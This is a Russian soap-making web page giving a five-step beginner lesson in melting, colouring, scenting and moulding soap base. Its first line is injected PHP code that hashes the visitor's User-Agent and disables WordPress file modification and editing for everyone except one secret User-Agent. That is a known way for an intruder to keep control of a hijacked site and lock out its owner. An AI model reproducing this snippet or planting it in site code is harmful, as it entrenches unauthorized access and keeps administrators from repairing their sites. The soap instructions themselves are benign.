if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Базовый урок по обучению мыловарению | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Базовый урок по обучению мыловарению для начинающих

Обладая минимумом знаний и умений, можно запросто заняться мыловарением для начинающих в домашних условиях. Для этого нужна мыльная основа, отдушка, краситель и любая формочка – это те компоненты, которые входят в базовый набор.

Обла­дая мини­му­мом зна­ний и уме­ний, мож­но запро­сто занять­ся мыло­ва­ре­ни­ем для начи­на­ю­щих в домаш­них усло­ви­ях.  Для это­го нуж­на мыль­ная осно­ва, отдуш­ка, кра­си­тель и любая фор­моч­ка – это те ком­по­нен­ты, кото­рые вхо­дят в базо­вый набор. А далее сле­дуя дан­но­му мастер-клас­су вы може­те создать мыло любой фор­мы, цве­та, запаха.

Но при любом спо­со­бе мыло­ва­ре­ния для начи­на­ю­щих из осно­вы важ­но соблю­дать несколь­ко правил:

  • Мыль­ную осно­ву мож­но рас­пла­вить как на вод­ной бане, так и в мик­ро­вол­нов­ке. Глав­ное, сле­дить за про­цес­сом и не дать заки­петь основе;
  • При­да­вать аро­мат мылу с помо­щью отдуш­ки необ­хо­ди­мо в послед­нюю оче­редь, что­бы он не улетучился;
  • Залив гото­вое мыло в фор­моч­ку оставь­те его осты­вать при ком­нат­ной температуре.

Базо­вый набор в этом мастер-клас­се мыло­ва­ре­ния для начи­на­ю­щих состо­ит из сле­ду­ю­щих компонентов:

  • мыль­ная осно­ва бело­го цве­та (при жела­нии мож­но заме­нить про­зрач­ной) – 100 г
  • кра­си­тель крас­но­го цве­та (жид­кий пиг­мент) – 2–5 к.
  • отдуш­ка с клуб­нич­ным запа­хом – 15–30 к.

Перей­дем к про­цес­су изго­тов­ле­ния мыла в домаш­них условиях

Шаг 1.

Сна­ча­ла мыль­ную осно­ву нуж­но рас­пла­вить удоб­ным для вас спо­со­бом, я пла­ви­ла в мик­ро­вол­нов­ке. Когда осно­ва ста­нет жид­кой, про­верь­те что­бы все комоч­ки растворились.

1

 Шаг 2.

Затем пере­хо­дим к окрас­ке мыла. Добав­ля­ем посте­пен­но кра­си­тель и пере­ме­ши­ва­ем, интен­сив­ность цве­та зави­сит от коли­че­ства краски.

2

 Шаг 3.

Оста­лось доба­вить послед­ний ком­по­нент – отдуш­ку, и еще раз тща­тель­но пере­ме­шать полу­чив­шу­ю­ся массу.

3

Шаг 4.

Пере­ли­ва­ем мыль­ную мас­су в фор­моч­ку для выпе­ка­ния, я поль­зо­ва­лась сили­ко­но­вой в фор­ме розоч­ки. В слу­чае если появи­лись пузырь­ки их необ­хо­ди­мо сра­зу убрать с помо­щью чисто­го спир­та или спе­ци­аль­но­го сред­ства, вод­ка же для это­го непригодна.

4

Шаг 5.

Мыло почти гото­во, оста­лось подо­ждать око­ло 2‑х часов что­бы оно затвер­де­ло. Про­цесс засты­ва­ния про­ис­хо­дит толь­ко при ком­нат­ной температуре.

5

Гото­вое мыло доста­ем из фор­мы, и мож­но при­сту­пать к его исполь­зо­ва­нию. Если вы дела­е­те сра­зу несколь­ко кусоч­ков, для того что­бы сохра­нить мыло в пер­во­на­чаль­ном виде его нуж­но замо­тать пище­вой плен­кой и убрать в тем­ное место.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Katerinka666

Люблю все творческое и считаю что нет цены тому, что сделано своими руками! С удовольствием делюсь своими мастер-классами и пользуюсь чужими для совершенствования своих навыков! Читайте все мои записи!